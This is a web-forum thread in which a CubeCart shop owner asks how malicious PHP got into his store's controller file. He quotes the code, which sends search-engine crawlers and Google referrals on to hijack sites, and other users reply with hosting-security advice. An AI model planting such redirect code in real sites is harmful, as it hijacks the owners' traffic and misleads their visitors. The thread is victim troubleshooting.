Transistor Posted July 7, 2015 Share Posted July 7, 2015 Running 5.2.14 with some modifications to convert store to quotation system.Customer reported that site working OK with direct URL entry but any links from Google were being redirected to another site. After some head scratching and a search of the files for the foreign site name I found the following code had been inserted into /controllers/controller.inc.php.if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) { header("HTTP/1.1 301 Moved Permanently"); header("Location: http://www.hijack-site-1.com/"); exit; } if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) { header("HTTP/1.1 301 Moved Permanently"); header("Location: http://www.hijack-site-2.com/item/product-folder/item-number.html"); exit; } I've changed the site CubeCart admin password.Anyone got any suggestions as to how the code was inserted? File permissions were set at 644.What do I do to prevent occurrence?Many thanks. Quote Link to comment Share on other sites More sharing options...
bsmither Posted July 7, 2015 Share Posted July 7, 2015 If you are on a shared hosting server, some attention can be given to the shared hosting provider.If you are on a dedicated server, then we can look at your site's web access logs and FTP access logs.Inserted into /controllers/controller.inc.php seems rather specific. The only damage I have seen to code that is on a shared server (where the attack could be blamed on an insecure application on someone else's account) was more general and damaged only every index.php file.A search on this code, one of the first hits in the result, suggests it is a common method to prevent users and bots from stealing your images found on search engines. But it's rather simple and straightforward, so, probably used in a lot of situations. Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted July 7, 2015 Share Posted July 7, 2015 HiBrian is correct in that if you are on a dedicated server then it is your security that can be looked at. If you are on shared hosting then they have probably not secured the server to prevent cross account havking which is common on cheaper hosting. If you are on shared hosting and this has happened then the best advice is to move to a better and more secure hosting companyIan Quote Link to comment Share on other sites More sharing options...
Transistor Posted July 7, 2015 Author Share Posted July 7, 2015 Thanks, guys.Yes, the site is hosted on my Reseller cPanel-based account which is, itself, on a shared server. (I'm a small-time operator!)I'll follow up on my webhost's forum. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.